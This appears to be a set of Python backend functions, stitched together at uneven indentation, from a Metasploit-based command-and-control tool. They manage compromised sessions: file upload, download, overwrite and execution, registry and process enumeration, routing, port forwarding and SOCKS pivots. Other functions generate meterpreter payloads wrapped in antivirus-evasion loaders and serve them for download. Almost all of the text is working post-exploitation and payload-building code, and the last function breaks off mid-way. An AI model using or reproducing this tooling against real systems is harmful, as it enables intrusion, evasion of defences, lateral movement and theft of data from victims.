    def create(sessionid=None, filename=None, dirpath=None, operation=None):
        """Run a file-system operation on a session: create a directory or upload a file.

        Args:
            sessionid: session id the post module is run against.
            filename: for 'upload_file', the value handed to the module as MSF_FILE
                      (presumably a file already on the MSF host -- verify against the module).
            dirpath: target directory on the session host; normalised via FileSession.deal_path.
            operation: 'create_dir' or 'upload_file'.

        Returns:
            A data_return(...) context: 301 when MSF gave no answer, 302 when the reply is not
            JSON, 303 when the module reported failure, 201 on success, 306 when the
            arguments do not match either operation.
        """
        module = 'multi/manage/file_system_operation_api'

        if operation == 'create_dir' and sessionid is not None and dirpath is not None:
            opts = {
                'OPERATION': 'create_dir',
                'SESSION': sessionid,
                'SESSION_DIR': FileSession.deal_path(dirpath),
            }
            # Synchronous call: the module answers with a JSON document.
            raw = MSFModule.run('post', module, opts, runasjob=False, timeout=12)
            if raw is None:
                return data_return(301, FileSession_MSG.get(301), [])
            try:
                parsed = json.loads(raw)
            except Exception as E:
                logger.warning(E)
                return data_return(302, FileSession_MSG.get(302), {})
            if parsed.get('status') is not True:
                return data_return(303, FileSession_MSG.get(303), [])
            return data_return(201, FileSession_MSG.get(201), parsed.get('data'))

        if operation == 'upload_file' and sessionid is not None and filename is not None and dirpath is not None:
            opts = {
                'OPERATION': 'upload',
                'SESSION': sessionid,
                'SESSION_DIR': FileSession.deal_path(dirpath),
                'MSF_FILE': filename,
            }
            # Uploads run as a background job; the raw job result is handed back as-is.
            raw = MSFModule.run('post', module, opts, runasjob=True, timeout=12)
            if raw is None:
                return data_return(301, FileSession_MSG.get(301), {})
            return data_return(201, FileSession_MSG.get(201), raw)

        return data_return(306, FileSession_MSG.get(306), [])
    def create(socks_type=None, port=None):
        """Start an MSF SOCKS server job (socks4a or socks5) listening on *port*.

        Args:
            socks_type: "msf_socks4a" or "msf_socks5"; any other value returns None.
            port: local TCP port for the server (SRVPORT).

        Returns:
            A data_return(...) context: 408 when the port is already in use, 303 when
            MSF returned no job id, 306 when the job is not alive right after start,
            201 on success (the opts dict, including 'job_id', is the payload).
        """
        # Module name and success-notice template per supported proxy type.
        servers = {
            "msf_socks4a": ("server/socks4a_api", "新建msf_socks4a代理成功,Port: {}"),
            "msf_socks5": ("server/socks5_api", "新建msf_socks5代理成功,Port: {}"),
        }
        if socks_type not in servers:
            # Unsupported type: nothing is started and nothing is returned (as before).
            return None
        mname, notice_fmt = servers[socks_type]

        # NOTE(review): SRVHOST 0.0.0.0 exposes the SOCKS listener on every interface,
        # and no authentication option is passed to the module here. Anyone who can
        # reach the port can pivot through the session network; restrict SRVHOST or
        # firewall the port unless the controller runs on an isolated host.
        opts = {'SRVHOST': '0.0.0.0', 'SRVPORT': port}

        is_free, _ports = is_empty_ports(port)
        if is_free is not True:
            return data_return(408, CODE_MSG.get(408), {})

        result = MSFModule.run(module_type="auxiliary", mname=mname, opts=opts, runasjob=True)
        if not isinstance(result, dict) or result.get('job_id') is None:
            opts['job_id'] = None
            return data_return(303, Socks_MSG.get(303), opts)

        job_id = int(result.get('job_id'))
        if not Job.is_msf_job_alive(job_id):
            return data_return(306, Socks_MSG.get(306), opts)

        opts['job_id'] = job_id
        # The template has a single placeholder; the second argument is ignored by format().
        Notice.send_success(notice_fmt.format(opts.get('SRVPORT'), opts.get('job_id')))
        return data_return(201, Socks_MSG.get(201), opts)
    def create(portfwdtype=None, lhost=None, lport=None, rhost=None, rport=None, sessionid=None):
        """Add a port forward on a session through the portfwd_api post module (CMD=add).

        Args:
            portfwdtype: forward type passed through as TYPE (validated by _check_host_port).
            lhost, lport: local end of the forward.
            rhost, rport: remote end of the forward.
            sessionid: session the forward is attached to.

        Returns:
            A data_return(...) context: the error context from _check_host_port on bad
            arguments, 308 when MSF gave no answer, 301 when the reply is not JSON or the
            module reported failure, 201 with the module's 'data' on success.
        """
        # Argument validation is delegated to the helper, which also builds the error context.
        ok, ctx = PortFwd._check_host_port(portfwdtype, lhost, lport, rhost, rport)
        if ok is not True:
            return ctx

        # NOTE(review): unlike the SOCKS create path, no local-port-in-use check is done
        # before asking MSF to bind lport.
        opts = {
            'TYPE': portfwdtype,
            'LHOST': lhost, 'LPORT': lport,
            'RHOST': rhost, 'RPORT': rport,
            'SESSION': sessionid,
            'CMD': 'add',
        }
        raw = MSFModule.run(module_type="post", mname="multi/manage/portfwd_api", opts=opts)
        if raw is None:
            return data_return(308, PORTFWD_MSG.get(308), {})

        try:
            parsed = json.loads(raw)
        except Exception as E:
            logger.warning(E)
            return data_return(301, PORTFWD_MSG.get(301), [])

        if parsed.get('status') is not True:
            return data_return(301, PORTFWD_MSG.get(301), [])

        Notice.send_success(f"新增端口转发 SID:{sessionid} {portfwdtype} {lhost}/{lport} {rhost}/{rport}")
        return data_return(201, PORTFWD_MSG.get(201), parsed.get('data'))
    def destory(subnet=None, netmask=None, sessionid=None):
        """Delete the route *subnet*/*netmask* that goes through *sessionid* (routeapi, CMD=delete).

        Returns:
            A data_return(...) context: 505 when MSF gave no answer, 306 when the reply is
            not JSON, 304 when the module reported failure, 204 on success.
        """
        opts = {
            'CMD': 'delete',
            'SUBNET': subnet,
            'NETMASK': netmask,
            'SESSION': sessionid,
        }
        raw = MSFModule.run(module_type="post", mname="multi/manage/routeapi", opts=opts)
        if raw is None:
            return data_return(505, CODE_MSG.get(505), [])

        try:
            parsed = json.loads(raw)
        except Exception as E:
            logger.warning(E)
            return data_return(306, Route_MSG.get(306), {})

        if parsed.get('status') is not True:
            return data_return(304, Route_MSG.get(304), {})

        Notice.send_info(f"删除路由,SID:{sessionid} {subnet}/{netmask}")
        return data_return(204, Route_MSG.get(204), {})
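    def generate_bypass_exe(mname=None, opts=None):
        """Generate an AV-evasion exe: a hex payload from MSF wrapped by the mingw loader.

        Args:
            mname: MSF payload module name, e.g. 'windows/x64/meterpreter/reverse_tcp'.
            opts: payload options; mutated in place (RHOST/LHOST dropped, Override* applied,
                  Format forced to 'hex') -- callers that reuse the dict see the changes.

        Returns:
            The bytes produced by Payload._create_payload_by_mingw, or None when MSF
            returned nothing.
        """
        # A reverse payload needs no RHOST and a bind payload no LHOST; the irrelevant
        # one is dropped. Substring membership replaces find() > 0, which missed a match
        # at index 0; pop(key, None) replaces the try/except-pass around a missing key.
        if "reverse" in mname:
            opts.pop('RHOST', None)
        elif "bind" in mname:
            opts.pop('LHOST', None)

        # OverrideRequestHost: the handler address baked into the payload is replaced by
        # the override pair and the flag itself is cleared before the module runs.
        if opts.get('OverrideRequestHost') is True:
            opts["LHOST"] = opts['OverrideLHOST']
            opts["LPORT"] = opts['OverrideLPORT']
            opts['OverrideRequestHost'] = False
            Notice.send_warn("Payload包含OverrideRequestHost参数")
            Notice.send_warn(f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
            Notice.send_warn(f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")

        # A boolean EXTENSIONS flag on a "meterpreter_" payload (presumably the stageless
        # variants) is turned into the 'stdapi' extension list MSF expects.
        if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
            opts['EXTENSIONS'] = 'stdapi'

        opts["Format"] = "hex"
        result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
        if result is None:
            return None
        shellcode = base64.b64decode(result.get('payload'))
        return Payload._create_payload_by_mingw(mname=mname, shellcode=shellcode)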
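    def create_post(loadpath=None, sessionid=None, hid=None, custom_param=None):
        """Instantiate the post module at *loadpath*, run its check(), and queue it on its broker.

        Args:
            loadpath: dotted module path. It must be registered (Xcache.get_moduleconfig
                      returns a config) before it is imported; that lookup is the only
                      thing standing between this argument and an arbitrary import.
            sessionid: session the module targets.
            hid: host id the module targets.
            custom_param: JSON string of module parameters; unparsable input becomes {}.

        Returns:
            A data_return(...) context: 305 for an unregistered module, a missing
            MODULE_BROKER or an unknown broker; 405 (with the module's own message) when
            check() fails; 301 when check() raises; 306 when the queue refused the
            module; 201 when it was queued.
        """
        module_config = Xcache.get_moduleconfig(loadpath)
        if module_config is None:
            return data_return(305, PostModuleActuator_MSG.get(305), {})

        try:
            custom_param = json.loads(custom_param)
        except Exception as E:
            logger.warning(E)
            custom_param = {}

        # SECURITY: import_module executes the target module's top level. The registry
        # check above must stay in front of it -- never import before that check passes.
        class_intent = importlib.import_module(loadpath)
        post_module_intent = class_intent.PostModule(sessionid, hid, custom_param)

        # Pre-flight: the module's own check() decides whether it may run on this target.
        try:
            flag, msg = post_module_intent.check()
            if flag is not True:
                return data_return(405, msg, {})
        except Exception as E:
            logger.warning(E)
            return data_return(301, PostModuleActuator_MSG.get(301), {})

        try:
            broker = post_module_intent.MODULE_BROKER
        except Exception as E:
            logger.warning(E)
            return data_return(305, PostModuleActuator_MSG.get(305), {})

        if broker == BROKER.post_python_job:
            queued = aps_module.putin_post_python_module_queue(post_module_intent)
        elif broker == BROKER.post_msf_job:
            queued = MSFModule.putin_post_msf_module_queue(post_module_intent)
        else:
            # Previously this branch only logged and fell through, returning None to the
            # caller; an unknown broker is reported as a module configuration error.
            logger.warning("错误的broker")
            return data_return(305, PostModuleActuator_MSG.get(305), {})

        if queued:
            return data_return(201, PostModuleActuator_MSG.get(201), {})
        return data_return(306, PostModuleActuator_MSG.get(306), {})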
    def run_bot_wait_list():
        """Move one queued bot request into the MSF job queue, if there is room.

        Nothing happens when three or more module tasks are already running or the
        wait list is empty. A request whose broker is not BROKER.bot_msf_job has
        already been popped and is dropped with an error log.
        """
        # Concurrency cap: at most three module tasks in flight.
        if Xcache.get_module_task_length() >= 3:
            return

        pending = Xcache.pop_one_from_bot_wait()
        if pending is None:
            return

        if pending.get("broker") != BROKER.bot_msf_job:
            logger.error("unknow broker")
            return
        MSFModule.putin_post_msf_module_queue(pending.get("module"))
 def update(sessionid, filepath, filedata):
     """Overwrite *filepath* on the session host with *filedata* (file_system_operation_api, update_file).

     The operation runs as a background job. Returns a data_return(...) context:
     204 carrying the raw job result, or 301 when MSF gave no answer.
     """
     opts = {
         'OPERATION': 'update_file',
         'SESSION': sessionid,
         'SESSION_FILE': filepath,
         'FILE_DATA': filedata,
     }
     job = MSFModule.run('post', 'multi/manage/file_system_operation_api', opts, runasjob=True, timeout=12)
     if job is None:
         return data_return(301, FileSession_MSG.get(301), {})
     return data_return(204, FileSession_MSG.get(204), job)
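    def generate_shellcode(mname=None, opts=None):
        """Generate raw shellcode / script source for payload *mname* from its options.

        Args:
            mname: MSF payload module name; substrings of it pick the RHOST/LHOST
                   handling and the output Format.
            opts: payload options; mutated in place (RHOST/LHOST dropped, Override*
                  applied, Format set) -- callers that reuse the dict see the changes.

        Returns:
            Decoded payload bytes, or None when MSF returned nothing.
        """
        # A reverse payload needs no RHOST and a bind payload no LHOST. Substring
        # membership replaces find() > 0, which missed a match at index 0; pop(key, None)
        # replaces the try/except-pass around a missing key.
        if "reverse" in mname:
            opts.pop('RHOST', None)
        elif "bind" in mname:
            opts.pop('LHOST', None)

        # OverrideRequestHost: the handler address baked into the payload is replaced by
        # the override pair. NOTE(review): unlike generate_bypass_exe, the flag itself is
        # not cleared here and is still handed to MSF -- confirm that is intended.
        if opts.get('OverrideRequestHost') is True:
            opts["LHOST"] = opts['OverrideLHOST']
            opts["LPORT"] = opts['OverrideLPORT']
            Notice.send_warn("Payload包含OverrideRequestHost参数")
            Notice.send_warn(
                f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
            Notice.send_warn(
                f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")

        # A boolean EXTENSIONS flag on a "meterpreter_" payload becomes the 'stdapi'
        # extension list MSF expects.
        if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
            opts['EXTENSIONS'] = 'stdapi'

        # Output format by platform substring; first match wins, 'raw' when none matches.
        opts["Format"] = 'raw'
        for needle, fmt in (("windows", 'raw'), ("linux", 'raw'), ("java", 'jar'),
                            ("python", 'py'), ("php", 'raw')):
            if needle in mname:
                opts["Format"] = fmt
                break

        result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
        if result is None:
            return None
        return base64.b64decode(result.get('payload'))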
 def download_file(self, filepath=None):
     """Pull *filepath* from the session host and return its bytes, or None on failure.

     The post module transfers the file into the MSF file store; it is then read back
     through FileMsf.read_msf_file under its base name.
     """
     opts = {
         'OPERATION': 'download',
         'SESSION': self.sessionid,
         'SESSION_FILE': filepath,
     }
     # Long timeout: large files take a while to come across.
     if MSFModule.run('post', 'multi/manage/file_system_operation_api', opts, timeout=300) is None:
         return None
     # NOTE(review): basename() uses the controller's own path rules; a Windows path
     # with backslashes may not be split as expected on a POSIX controller -- verify.
     return FileMsf.read_msf_file(os.path.basename(filepath))
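 def registry_enumkeys(self, key, view=0):
     """Enumerate the subkeys of registry key *key* on the session host.

     Args:
         key: registry key path to enumerate.
         view: registry view selector passed through as VIEW (0 by default).

     Returns:
         The module's parsed JSON reply, or a dict with 'status' False when MSFRPC gave
         no answer or the reply was not valid JSON. The failure 'message' is always a
         string, so the dict stays JSON-serialisable (previously the exception object
         itself was returned).
     """
     opts = {
         'SESSION': self.sessionid,
         'VIEW': view,
         'OPERATION': "registry_enumkeys",
         'KEY': key,
     }
     raw = MSFModule.run(module_type="post", mname="windows/manage/registry_api", opts=opts, timeout=12)
     if raw is None:
         return {'status': False, "message": "MSFRPC Error", "data": None}
     try:
         return json.loads(raw)
     except Exception as E:
         return {'status': False, "message": str(E), "data": None}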
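    def _get_info(self, info_part):
        """Fetch one section of base_info for this session via multi/gather/base_info.

        Args:
            info_part: INFO_PART selector handed to the module.

        Returns:
            The module's 'data' when it reported status True; None when the session id
            is unusable (None or <= 0), MSF gave no answer, the reply was not JSON, or
            the module reported failure.
        """
        # One guard instead of the earlier duplicated `is None` checks around the opts build.
        if self.sessionid is None or self.sessionid <= 0:
            return None
        opts = {'SESSION': self.sessionid, 'INFO_PART': info_part}
        raw = MSFModule.run(module_type="post", mname="multi/gather/base_info", opts=opts)
        if raw is None:
            return None
        try:
            reply = json.loads(raw)
            return reply.get('data') if reply.get('status') else None
        except Exception as E:
            # Covers both a non-JSON reply and a JSON document that is not an object.
            logger.warning(E)
            return None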
    def create(subnet=None, netmask=None, sessionid=None, autoroute=None):
        """Add a route through *sessionid*: one *subnet*/*netmask*, or autoroute when requested.

        Returns:
            A data_return(...) context: 505 when MSF gave no answer, 306 when the reply
            is not JSON, 305 when the module failed or did not return a list, 201 with
            the returned route list on success.
        """
        if autoroute is True:
            opts = {'CMD': 'autoadd', 'SESSION': sessionid}
        else:
            opts = {'CMD': 'add', 'SUBNET': subnet, 'NETMASK': netmask, 'SESSION': sessionid}

        raw = MSFModule.run(module_type="post", mname="multi/manage/routeapi", opts=opts)
        if raw is None:
            return data_return(505, CODE_MSG.get(505), [])
        try:
            reply = json.loads(raw)
        except Exception as E:
            logger.warning(E)
            return data_return(306, Route_MSG.get(306), [])

        routes = reply.get('data')
        # Success requires both status True and a list payload.
        if reply.get('status') is not True or not isinstance(routes, list):
            return data_return(305, Route_MSG.get(305), [])

        if autoroute:
            Notice.send_success(f"新增路由,SID:{sessionid} 自动模式")
        else:
            Notice.send_success(f"新增路由,SID:{sessionid} {subnet}/{netmask}")
        return data_return(201, Route_MSG.get(201), routes)
 def destory(portfwdtype=None, lhost=None, lport=None, rhost=None, rport=None, sessionid=None):
     """Remove a port forward on *sessionid* (portfwd_api, CMD=delete).

     Returns:
         A data_return(...) context: 306 when no session id was given, 308 when MSF gave
         no answer, 302 when the reply is not JSON, 305 when the module reported failure,
         204 with the module's 'data' on success.
     """
     # The original condition was `sessionid is not None or sessionid == -1`; the second
     # half can never be true when the first is false, so only the None check is kept.
     # NOTE(review): if -1 was meant to be rejected, an explicit `!= -1` check is needed.
     if sessionid is None:
         return data_return(306, PORTFWD_MSG.get(306), [])

     opts = {
         'TYPE': portfwdtype,
         'LHOST': lhost, 'LPORT': lport,
         'RHOST': rhost, 'RPORT': rport,
         'SESSION': sessionid, 'CMD': 'delete',
     }
     raw = MSFModule.run(module_type="post", mname="multi/manage/portfwd_api", opts=opts)
     if raw is None:
         return data_return(308, PORTFWD_MSG.get(308), {})
     try:
         reply = json.loads(raw)
     except Exception as E:
         logger.warning(E)
         return data_return(302, PORTFWD_MSG.get(302), [])
     if reply.get('status') is not True:
         return data_return(305, PORTFWD_MSG.get(305), [])
     Notice.send_info(f"删除端口转发 SID:{sessionid} {portfwdtype} {lhost}/{lport} {rhost}/{rport}")
     return data_return(204, PORTFWD_MSG.get(204), reply.get('data'))
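    def create(mname=None, opts=None):
        """Generate a payload file for *mname* and return it as a Django download response.

        Args:
            mname: MSF payload module name; substrings of it choose the RHOST/LHOST
                   handling and the automatic Format.
            opts: payload options; mutated in place (RHOST/LHOST dropped, Override*
                  applied, Format rewritten). Besides MSF's own formats the block handles
                  'AUTO', the '*-diy' loaders, 'msbuild', 'exe-src' and 'exe-src-service'.

        Returns:
            An HttpResponse carrying the file bytes with Code/Message/Content-Disposition
            headers, or a data_return(...) context: 306 when AUTO cannot pick a format,
            305 when MSF returned no payload.
        """

        def _run_payload():
            """Run the payload module with the current opts; decoded bytes, or None."""
            result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
            if result is None:
                return None
            return base64.b64decode(result.get('payload'))

        def _read_tmp_file(name):
            """Read a generated file from File.tmp_dir(); the handle is closed here
            instead of being handed to HttpResponse still open."""
            with open(os.path.join(File.tmp_dir(), name), 'rb') as fh:
                return fh.read()

        # Clear previously generated payload files before producing a new one.
        Payload._destroy_old_files()

        # A reverse payload needs no RHOST and a bind payload no LHOST. Substring
        # membership replaces find() > 0, which missed a match at index 0.
        if "reverse" in mname:
            opts.pop('RHOST', None)
        elif "bind" in mname:
            opts.pop('LHOST', None)

        # OverrideRequestHost: replace the handler address with the override pair and
        # clear the flag before the module runs.
        if opts.get('OverrideRequestHost') is True:
            opts["LHOST"] = opts['OverrideLHOST']
            opts["LPORT"] = opts['OverrideLPORT']
            opts['OverrideRequestHost'] = False
            Notice.send_warn("Payload包含OverrideRequestHost参数")
            Notice.send_warn(f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
            Notice.send_warn(f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")

        # A boolean EXTENSIONS flag on a "meterpreter_" payload becomes 'stdapi'.
        if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
            opts['EXTENSIONS'] = 'stdapi'

        # AUTO: pick a file format from the platform named in the payload path.
        if opts.get("Format") == "AUTO":
            auto_format = None
            for needle, fmt in (("windows", 'exe-src'), ("linux", 'elf'), ("java", 'jar'),
                                ("python", 'py'), ("php", 'raw')):
                if needle in mname:
                    auto_format = fmt
                    break
            if auto_format is None:
                return data_return(306, Payload_MSG.get(306), {})
            opts["Format"] = auto_format

        # Requested format, captured before the branches overwrite opts["Format"].
        fmt = opts.get("Format")

        if fmt in ["exe-diy", "dll-diy", "dll-mutex-diy", "elf-diy"]:
            # Hex payload wrapped by the matching loader; the loader writes a zip to tmp_dir.
            opts["Format"] = "hex"
            shellcode = _run_payload()
            if shellcode is None:
                return data_return(305, Payload_MSG.get(305), {})
            filename = Payload._create_payload_with_loader(mname, shellcode, payload_type=fmt)
            byteresult = _read_tmp_file(filename)
            if opts.get("HandlerName") is not None:
                # NOTE(review): the literal "(unknown)" suffix looks like a placeholder in
                # this listing; confirm the intended download name before relying on it.
                filename = f"{opts.get('HandlerName')}_(unknown)"
        elif fmt == "msbuild":
            # C# source wrapped into an msbuild project; the helper writes a zip to tmp_dir.
            opts["Format"] = "csharp"
            shellcode = _run_payload()
            if shellcode is None:
                return data_return(305, Payload_MSG.get(305), {})
            filename = Payload._create_payload_use_msbuild(mname, shellcode)
            byteresult = _read_tmp_file(filename)
        elif fmt == "exe-src":
            opts["Format"] = "hex"
            shellcode = _run_payload()
            if shellcode is None:
                return data_return(305, Payload_MSG.get(305), {})
            byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=shellcode)
            # NOTE(review): second-resolution names collide when two requests land in the
            # same second.
            filename = "{}.exe".format(int(time.time()))
        elif fmt == "exe-src-service":
            opts["Format"] = "hex"
            shellcode = _run_payload()
            if shellcode is None:
                return data_return(305, Payload_MSG.get(305), {})
            byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=shellcode,
                                                          payload_type="REVERSE_HEX_AS_SERVICE")
            filename = "{}.exe".format(int(time.time()))
        else:
            # Plain MSF formats: map the format to a file extension; unknown ones get none.
            file_suffix = {
                "c": "c",
                "csharp": "cs",
                "exe": "exe",
                "exe-service": "exe",
                "powershell": "ps1",
                "psh-reflection": "ps1",
                "psh-cmd": "ps1",
                "hex": "hex",
                "hta-psh": "hta",
                "raw": "raw",
                "vba": "vba",
                "vbscript": "vbs",
                "elf": None,
                "elf-so": "so",
                "jar": "jar",
                "java": "java",
                "war": "war",
                "python": "py",
                "py": "py",
                "python-reflection": "py",
            }
            byteresult = _run_payload()
            if byteresult is None:
                return data_return(305, Payload_MSG.get(305), {})
            suffix = file_suffix.get(fmt)
            if suffix is None:
                filename = "{}".format(int(time.time()))
            else:
                filename = "{}.{}".format(int(time.time()), suffix)

        response = HttpResponse(byteresult)
        response['Content-Type'] = 'application/octet-stream'
        response['Code'] = 200
        response['Message'] = parse.quote(Payload_MSG.get(201))
        # Non-ASCII stems are percent-encoded so the header stays ASCII; the extension is kept.
        stem, ext = os.path.splitext(filename)
        # NOTE(review): this is a bare name rather than an RFC 6266
        # `attachment; filename=...` value; the front end presumably parses it itself --
        # verify before changing the shape of this header.
        response['Content-Disposition'] = f"{parse.quote(stem, 'utf-8')}{ext}"
        return response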
    def __init__(self,
                 sessionid=None,
                 rightinfo: bool = False,
                 uacinfo: bool = False,
                 pinfo: bool = False) -> None:
        """Session view: basic info always, plus optional rights / UAC / process details.

        Args:
            sessionid: id of the MSF session to describe.
            rightinfo: also fetch the RIGHTINFO part (admin-group membership, TEMP dir).
            uacinfo: also fetch the UACINFO part (UAC state, level, integrity).
            pinfo: also fetch the PINFO part (session process and process list).

        Extended info comes from Xcache when a cached entry exists, otherwise from the
        multi/gather/session_info module; it is written back to the cache only when all
        three extended parts were requested. Failures are reported through Notice and
        the logger; they do not raise.
        """
        self.sessionid = sessionid
        self._rightinfo = rightinfo  # UAC switch, UAC registration, TEMP directory
        self._uacinfo = uacinfo  # admin group, integrity
        self._pinfo = pinfo  # process-related information
        self._session_uuid = None
        self.update_time = 0

        # RIGHTINFO
        self.is_in_admin_group = None
        self.is_admin = None
        self.tmpdir = None

        # UACINFO
        self.is_uac_enable = None
        self.uac_level = -1
        self.integrity = None

        # PINFO
        self.pid = -1
        self.pname = None
        self.ppath = None
        self.puser = None
        self.parch = None
        self.processes = []

        # Basic information
        self.load_powershell = False
        self.load_python = False
        self.domain = None
        self.session_host = None
        self.session_port = None
        self.target_host = None
        self.type = None
        self.computer = None
        self.arch = None
        self.platform = None
        self.last_checkin = 0
        self.user = None
        self.os = None
        self.os_short = None
        self.logged_on_users = 0
        self.tunnel_local = None
        self.tunnel_peer = None
        self.tunnel_peer_ip = None
        self.tunnel_peer_locate = None
        self.tunnel_peer_asn = None
        self.via_exploit = None
        self.via_payload = None
        self.route = []

        self.sysinfo = {}
        self.exploit_uuid = None
        self.available = False
        self.info = None
        # NOTE(review): overrides the -1 assigned under PINFO above; this later value wins.
        self.pid = 0
        # Populate the basic information
        self._set_base_info()

        # Extended information only when at least one part was requested
        if self._rightinfo or self._pinfo or self._uacinfo:
            # Cached value is a JSON string, reused as-is without re-checking which parts it holds.
            result = Xcache.get_session_info(self.sessionid)
            if result is None:
                module_type = "post"
                mname = "multi/gather/session_info"
                opts = {
                    'SESSION': self.sessionid,
                    'PINFO': self._pinfo,
                    'RIGHTINFO': self._rightinfo,
                    'UACINFO': self._uacinfo
                }
                result = MSFModule.run(module_type=module_type,
                                       mname=mname,
                                       opts=opts,
                                       timeout=30)
                if result is None:
                    Notice.send_warning("更新Session信息失败,请稍后重试")
                    return
            try:
                result_dict = json.loads(result)
                self._set_advanced_info(result_dict)
                # Only a full (all three parts) result is cached, stamped with the fetch time.
                if self._rightinfo and self._pinfo and self._uacinfo:
                    result_dict["update_time"] = int(time.time())
                    Xcache.set_session_info(self.sessionid,
                                            json.dumps(result_dict))
            except Exception as E:
                logger.warning(E)
                logger.warning("更新Session信息失败,返回消息为{}".format(result))
                Notice.send_warning("更新Session信息失败,请稍后重试")
    def list(sessionid=None,
             filepath=None,
             dirpath=None,
             operation=None,
             arg=""):

        if operation == "list" and sessionid is not None and dirpath is not None:  # 列目录
            formatdir = FileSession.deal_path(dirpath)
            opts = {
                'OPERATION': 'list',
                'SESSION': sessionid,
                'SESSION_DIR': formatdir
            }
            result = MSFModule.run('post',
                                   'multi/manage/file_system_operation_api',
                                   opts,
                                   runasjob=False,
                                   timeout=12)
            if result is None:
                context = data_return(301, FileSession_MSG.get(301), {})
                return context
            try:
                result = json.loads(result)
            except Exception as E:
                logger.warning(E)
                context = data_return(302, FileSession_MSG.get(302), {})
                return context

            if result.get('status') is not True:
                context = data_return(303, FileSession_MSG.get(303), {})
                return context
            else:
                data = result.get('data')
                entries = data.get('entries')
                path = data.get('path')
                for one in entries:
                    if len(one.get('mode').split('/')) > 1:
                        one['format_mode'] = one.get('mode').split('/')[1]
                    else:
                        one['format_mode'] = ''

                    if one.get('total_space') is not None and one.get(
                            'free_space') is not None:
                        use_space = one.get('total_space') - one.get(
                            'free_space')
                        one['format_size'] = FileSession.get_size_in_nice_string(
                            use_space)
                        one['format_mode'] = '{}|{}'.format(
                            FileSession.get_size_in_nice_string(
                                one.get('free_space')),
                            FileSession.get_size_in_nice_string(
                                one.get('total_space')))
                    else:
                        one['format_size'] = FileSession.get_size_in_nice_string(
                            one.get('size'))

                    if one.get('size') is None or one.get(
                            'size') >= 1024 * 100:
                        one['cat_able'] = False
                    else:
                        one['cat_able'] = True

                    if one.get('type') in [
                            'directory', 'file', 'fixed', "remote"
                    ]:
                        one['absolute_path'] = os.path.join(
                            path,
                            one.get('name')).replace('\\\\',
                                                     '/').replace('\\', '/')
                    elif one.get('type') in ['fix', 'cdrom']:
                        one['absolute_path'] = "{}".format(one.get('name'))
                    else:
                        one['absolute_path'] = "{}".format(path)

                context = data_return(200, CODE_MSG.get(200), data)
                return context
        elif operation == 'pwd' and sessionid is not None:  # 列当前目录
            opts = {'OPERATION': 'pwd', 'SESSION': sessionid}
            result = MSFModule.run('post',
                                   'multi/manage/file_system_operation_api',
                                   opts,
                                   runasjob=False,
                                   timeout=12)
            if result is None:
                context = data_return(301, FileSession_MSG.get(301), {})
                return context
            try:
                result = json.loads(result)
            except Exception as E:
                logger.warning(E)
                context = data_return(302, FileSession_MSG.get(302), {})
                return context

            if result.get('status') is not True:
                context = data_return(303, FileSession_MSG.get(303), {})
                return context
            else:
                data = result.get('data')
                entries = data.get('entries')
                path = data.get('path')
                for one in entries:
                    one['format_size'] = FileSession.get_size_in_nice_string(
                        one.get('size'))
                    if one.get('size') >= 1024 * 100:
                        one['cat_able'] = False
                    else:
                        one['cat_able'] = True
                    if one.get('type') in ['directory', 'file']:
                        one['absolute_path'] = os.path.join(
                            path,
                            one.get('name')).replace('\\\\',
                                                     '/').replace('\\', '/')
                    elif one.get('type') in ['fix', 'cdrom']:
                        one['absolute_path'] = "{}".format(one.get('name'))
                    else:
                        one['absolute_path'] = "{}".format(path)
                    if len(one.get('mode').split('/')) > 1:
                        one['format_mode'] = one.get('mode').split('/')[1]
                    else:
                        one['format_mode'] = ''
                context = data_return(200, CODE_MSG.get(200), data)
                return context
        elif operation == 'download' and sessionid is not None and filepath is not None:  # 下载文件
            opts = {
                'OPERATION': 'download',
                'SESSION': sessionid,
                'SESSION_FILE': filepath
            }
            result = MSFModule.run('post',
                                   'multi/manage/file_system_operation_api',
                                   opts,
                                   runasjob=True)  # 后台运行
            if result is None:
                context = data_return(301, FileSession_MSG.get(301), {})
                return context
            else:
                context = data_return(200, CODE_MSG.get(200), result)
                return context
        elif operation == "run":  # 执行文件
            opts = {
                'OPERATION': 'execute',
                'SESSION': sessionid,
                'SESSION_FILE': filepath,
                'ARGS': arg
            }
            result = MSFModule.run('post',
                                   'multi/manage/file_system_operation_api',
                                   opts,
                                   runasjob=True)  # 后台运行
            if result is None:
                context = data_return(301, FileSession_MSG.get(301), {})
                return context
            else:
                context = data_return(202, FileSession_MSG.get(202), result)
                return context
        elif operation == "cat":  # 查看文件
            opts = {
                'OPERATION': 'cat',
                'SESSION': sessionid,
                'SESSION_FILE': filepath
            }
            moduleresult = MSFModule.run(
                'post',
                'multi/manage/file_system_operation_api',
                opts,
                runasjob=False,
                timeout=12)  # 后台运行
            if moduleresult is None:
                context = data_return(301, FileSession_MSG.get(301), {})
                return context
            else:
                try:
                    moduleresult = json.loads(moduleresult)
                except Exception as E:
                    logger.warning(E)
                    context = data_return(302, FileSession_MSG.get(302), {})
                    return context

                if moduleresult.get("status"):
                    filedata = base64.b64decode(
                        moduleresult.get("data")).decode("utf-8", 'ignore')
                    result = {"data": filedata, "reason": filepath}
                    context = data_return(200, CODE_MSG.get(200), result)
                    return context
                else:
                    result = {
                        "data": None,
                        "reason": moduleresult.get("message")
                    }
                    context = data_return(303, FileSession_MSG.get(303),
                                          result)
                    return context

        elif operation == "cd":  # 查看文件
            formatdir = FileSession.deal_path(dirpath)
            opts = {
                'OPERATION': 'cd',
                'SESSION': sessionid,
                'SESSION_DIR': formatdir
            }
            moduleresult = MSFModule.run(
                'post',
                'multi/manage/file_system_operation_api',
                opts,
                runasjob=False,
                timeout=12)  # 后台运行
            if moduleresult is None:
                context = data_return(301, FileSession_MSG.get(301), {})
                return context
            else:
                try:
                    moduleresult = json.loads(moduleresult)
                except Exception as E:
                    logger.warning(E)
